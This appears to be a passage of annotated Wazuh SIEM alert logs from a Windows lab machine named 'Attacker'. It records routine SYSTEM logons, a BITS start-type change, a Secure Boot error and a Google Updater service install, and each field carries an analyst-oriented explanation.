data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533888.126141 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:39.2603970Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2907 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5692 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533889.127951 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:42:50.7769481Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43478 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533889.135289 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:42:59.1075434Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43480 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533890.142627 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-TPM-WMI No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {7d5387b0-cbe0-11da-a94d-0800200c9a66} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1796 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:55.0846511Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2913 Incremental log record number – handy for timeline order.
data.win.system.processID: 14920 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 3420 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The Secure Boot update failed to update a Secure Boot variable with error Secure Boot is not enabled on this machine.. For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hResult: -2147020471 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: New Windows Service Created Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61138 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533891.144212 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7045 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:59.3145318Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2915 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13696 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "A service was installed in the system.
Service Name: Google Updater Internal Service (GoogleUpdaterInternalService137.0.7129.0)
Service File Name: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update-internal
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceName: Google Updater Internal Service (GoogleUpdaterInternalService137.0.7129.0) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.imagePath: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceType: user mode service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.startType: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.accountName: LocalSystem No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533892.146887 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:43:28.0949229Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43488 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533892.154225 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:43:57.0508466Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43490 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
